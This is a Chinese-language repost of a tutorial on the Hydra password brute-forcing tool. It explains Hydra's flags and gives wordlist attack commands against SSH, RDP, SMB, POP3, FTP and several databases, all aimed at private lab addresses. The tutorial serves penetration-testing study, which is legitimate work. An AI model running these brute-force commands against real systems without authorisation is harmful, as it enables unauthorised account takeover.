應(yīng)用協(xié)議安全:Hydra 端口爆破工具.(九頭蛇)
Hydra 也叫九頭蛇,是一款開源的暴力PJ工具,集成在kali當(dāng)中。可以對(duì)多種服務(wù)的賬號(hào)和密碼進(jìn)行爆破,包括 Web 登錄、數(shù)據(jù)庫、SSH、FTP 等服務(wù).
目錄:
應(yīng)用協(xié)議安全:Hydra 端口爆破工具.(九頭蛇)
Hydra(九頭蛇)使用:
使用方法:直接打開 kali?終端,輸入.
(1)實(shí)戰(zhàn):爆破 SSH 協(xié)議.( 22 端口 )
(2)實(shí)戰(zhàn):爆破 遠(yuǎn)程桌面 RDP.( 3389 端口 )
(3)實(shí)戰(zhàn):爆破?共享文件 SMB?( 445 端口 )
(4)實(shí)戰(zhàn):爆破?郵箱協(xié)議 POP3( 110 端口 )
(5)實(shí)戰(zhàn):爆破?文件傳輸 FTP?( 21 端口 )
(6)實(shí)戰(zhàn):爆破?MSSQL數(shù)據(jù)庫( 1433 端口 )
(7)實(shí)戰(zhàn):爆破?MySQL數(shù)據(jù)庫( 3306?端口 )
(8)實(shí)戰(zhàn):爆破?Oracle數(shù)據(jù)庫( 1521?端口 )
(9)實(shí)戰(zhàn):爆破?Redis數(shù)據(jù)庫( 6379?端口 )
(10)實(shí)戰(zhàn):爆破?PgSQL數(shù)據(jù)庫( 5432?端口 )
免責(zé)聲明:
嚴(yán)禁利用本文章中所提到的技術(shù)進(jìn)行非法攻擊,否則后果自負(fù),上傳者不承擔(dān)任何責(zé)任。
Hydra(九頭蛇)使用的參數(shù):
-s 指定端口
-l 指定用戶名
-L 指定用戶名字典(文件)
-p 指定密碼破解
-P 指定密碼字典(文件)
-o 保存執(zhí)行結(jié)果
-e 空密碼探測和指定用戶密碼探測(ns)
-C 用戶名可以用:分割(username:password)
-vV 顯示詳細(xì)過程
Hydra(九頭蛇)使用:
使用方法:直接打開 kali?終端,輸入.
hydra
(1)實(shí)戰(zhàn):爆破 SSH 協(xié)議.( 22 端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.105 ssh
-L 指定用戶名字典(文件)
-P 指定密碼字典(文件)
ssh iwebsec@192.168.0.105 //登錄 ssh (22端口)
ssh 賬號(hào)@地址
(2)實(shí)戰(zhàn):爆破 遠(yuǎn)程桌面 RDP.( 3389 端口 )
hydra -l administrator -P /root/root.txt 192.168.0.106 rdp -vV
-l 指定用戶名
-P 指定密碼字典(文件)
-vV 顯示詳細(xì)過程
rdesktop 192.168.0.106:3389 //登錄遠(yuǎn)程桌面3389
rdesktop 地址:3389
(3)實(shí)戰(zhàn):爆破?共享文件 SMB?( 445 端口 )
hydra -l administrator -P /root/root.txt 192.168.0.106 smb
-l 指定用戶名
-P 指定密碼字典(文件)
(4)實(shí)戰(zhàn):爆破?郵箱協(xié)議 POP3( 110 端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.105 pop3 -vV
-L 指定用戶名字典(文件)
-P 指定密碼字典(文件)
-vV 顯示詳細(xì)過程
(5)實(shí)戰(zhàn):爆破?文件傳輸 FTP?( 21 端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.105 ftp -vV
-L 指定用戶名字典(文件)
-P 指定密碼字典(文件)
-vV 顯示詳細(xì)過程
(6)實(shí)戰(zhàn):爆破?MSSQL數(shù)據(jù)庫( 1433 端口 )
hydra -l sa -P /root/root.txt 192.168.0.106 mssql -vV
-l 指定用戶名
-P 指定密碼字典(文件)
-vV 顯示詳細(xì)過程
(7)實(shí)戰(zhàn):爆破?MySQL數(shù)據(jù)庫( 3306?端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 mysql -vV
-L 指定用戶名字典(文件)
-P 指定密碼字典(文件)
-vV 顯示詳細(xì)過程
(8)實(shí)戰(zhàn):爆破?Oracle數(shù)據(jù)庫( 1521?端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 oracle -vV
-L 指定用戶名字典(文件)
-P 指定密碼字典(文件)
-vV 顯示詳細(xì)過程
(9)實(shí)戰(zhàn):爆破?Redis數(shù)據(jù)庫( 6379?端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 redis -vV
-L 指定用戶名字典(文件)
-P 指定密碼字典(文件)
-vV 顯示詳細(xì)過程
(10)實(shí)戰(zhàn):爆破?PgSQL數(shù)據(jù)庫( 5432?端口 )
hydra -L /root/root.txt -P /root/root.txt 192.168.0.106 postgresql -vV
-L 指定用戶名字典(文件)
-P 指定密碼字典(文件)
-vV 顯示詳細(xì)過程
? ? ?
? ? ??文章來源地址http://www.zghlxwxcb.cn/news/detail-636578.html文章來源:http://www.zghlxwxcb.cn/news/detail-636578.html
? ? ??
到了這里,關(guān)于網(wǎng)絡(luò)安全:Hydra 端口爆破工具.(九頭蛇)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!